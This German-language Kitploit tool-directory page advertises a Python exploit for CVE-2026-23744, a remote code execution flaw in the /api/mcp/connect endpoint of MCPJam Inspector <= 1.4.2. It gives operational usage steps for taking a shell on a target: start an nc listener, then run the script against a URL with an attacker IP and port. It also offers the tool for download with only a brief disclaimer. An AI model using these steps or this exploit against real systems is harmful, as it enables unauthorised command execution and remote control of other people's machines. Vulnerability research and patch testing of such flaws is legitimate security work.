Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-23744-RCE-for-MCPjam-inspector-v1.4.2 — Python-Exploit für CVE-2026-23744, der durch manipulierte POST-Anfragen an den /api/mcp/connect-Endpunkt in MCPJam Inspector <= 1.4.2 eine Remote-Code-Ausführung ermöglicht. | Kitploit
Tools/GitHubGitHub/srginebras/cve-2026-23744-rce-for-mcpjam-inspector-v1.4.2
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed Teaming
GitHubsrginebras/cve-2026-23744-rce-for-mcpjam-inspector-v1.4.2

CVE-2026-23744-RCE-for-MCPjam-inspector-v1.4.2

Python-Exploit für CVE-2026-23744, der durch manipulierte POST-Anfragen an den /api/mcp/connect-Endpunkt in MCPJam Inspector <= 1.4.2 eine Remote-Code-Ausführung ermöglicht.

Repository anzeigen
11vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-23744-RCE-für-MCPjam-inspector-v1.4.2

Eine kritische RCE-Schwachstelle in MCPJam Inspector <= 1.4.2 ist möglich, wenn der Endpunkt /api/mcp/connect standardmäßig auf allen Netzwerkschnittstellen (0.0.0.0) lauscht und es versäumt, die vom Benutzer bereitgestellten Eingaben, die an die Parameter command und args im serverConfig-JSON-Objekt übergeben werden, ordnungsgemäß zu bereinigen.

Ein Angreifer kann diese Schwachstelle ausnutzen, indem er eine manipulierte POST-Anfrage an /api/mcp/connect sendet und so eine beliebige Befehlsausführung auf dem Zielsystem mit den Berechtigungen des MCPJam-Dienstes erreicht.


VERWENDUNG

  1. Abhängigkeiten installieren
root@kitploit:~
 pip install request
  1. Einen Listener mit nc starten
root@kitploit:~
sudo nc -lvnp <port>
  1. Den Exploit starten
root@kitploit:~
python3 CVE-2026-23744.py -u <url> -i <attacker-ip> -p <attacker-port>
  1. Für eine bessere Nutzung empfehle ich, das Terminal auf ein voll funktionsfähiges zu aktualisieren, da sonst Befehle wie ctrl^c nicht verwendet werden können.

Beispiel

Bild Bild

Verwenden Sie diesen Exploit nur in kontrollierten Umgebungen

⚠️Verwendung auf eigene Gefahr⚠️

Tool herunterladen